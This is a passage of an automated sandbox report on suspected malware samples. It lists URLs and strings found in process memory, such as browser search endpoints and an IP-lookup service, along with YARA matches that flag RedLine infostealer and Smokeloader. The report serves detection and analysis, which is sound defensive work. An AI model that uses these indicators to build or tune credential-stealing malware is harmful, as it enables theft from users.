                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000005199000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id40
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: W7ANVukbbj.exe, 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, uPD30tM82.exe.0.drString found in binary or memory: https://api.ip.sb/ip
                    Source: uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003836000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000392E000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Source: 1.2.twl97yF91.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2cb0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f96cde.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.76c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.76c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 14.0.uPD30tM82.exe.2b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.4b10ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.2.twl97yF91.exe.2f96cde.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000001.00000002.322292427.0000000002E68000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: W7ANVukbbj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.twl97yF91.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.2f97bc6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.2cb0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.2f96cde.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.W7ANVukbbj.exe.4a26820.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.4b10000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.3.twl97yF91.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.76c0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.4b10000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.3.twl97yF91.exe.2ecf3b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.2.twl97yF91.exe.76c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
